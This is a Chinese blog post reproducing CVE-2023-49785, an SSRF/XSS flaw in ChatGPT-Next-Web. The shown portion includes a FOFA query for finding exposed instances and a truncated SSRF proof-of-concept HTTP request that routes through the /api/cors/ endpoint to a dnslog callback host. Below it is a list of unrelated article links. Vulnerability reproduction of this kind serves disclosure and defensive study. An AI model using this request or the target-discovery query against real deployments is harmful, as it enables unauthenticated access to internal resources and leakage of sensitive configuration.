ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)

  • 开发
  • 41

0x01 产品简介

ChatGPT-Next-Web 是一种基于 OpenAI 的 GPT-3.5 、GPT-4.0语言模型的产品。它是设计用于 Web 环境中的聊天机器人,旨在为用户提供自然语言交互和智能对话的能力。

0x02 漏洞概述

2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS 漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。

0x03 复现环境

FOFA:app="ChatGPT-Next-Web"

0x04 漏洞复现

SSRF-PoC

GET /api/cors/http:%2f%2fnextchat.2222222222.pb0e92.dnslog.cn%23 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connectio
阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-14 19:36:01       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-14 19:36:01       101 阅读

  9. 在Django里面运行非项目文件

    2024-03-14 19:36:01       82 阅读

  19. Python语言-面向对象

    2024-03-14 19:36:01       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-03-14 19:36:01       85 阅读

热门阅读

  2. day2-C++

    day2-C++

    2024-03-14 19:36:01      31 阅读

  4. 当代计算机语言占比分析

    2024-03-14 19:36:01       50 阅读

  5. 文件系统事件监听

    2024-03-14 19:36:01       43 阅读

  6. 【OpenGL经验谈01】Vertex 规范最佳实践

    2024-03-14 19:36:01       41 阅读

  7. SpringCloud中Gateway提示OPTIONS请求跨域问题

    2024-03-14 19:36:01       41 阅读

  9. [数据集][目标检测]垃圾检测数据集VOC+YOLO格式6004张18类别垃圾

    2024-03-14 19:36:01       43 阅读

  13. 如何详细自学python?

    2024-03-14 19:36:01       41 阅读

  19. 自动化运维工具Ansible之playbooks剧本

    2024-03-14 19:36:01       49 阅读

  20. Android 卫星通信计算方位角,仰角,极化角

    2024-03-14 19:36:01       36 阅读

  23. 深度学习与机器学习:互补共进,共绘人工智能宏伟蓝图

    2024-03-14 19:36:01       51 阅读

  24. el-table 合集行合并

    2024-03-14 19:36:01       39 阅读

  27. 数据库基础知识

    2024-03-14 19:36:01       36 阅读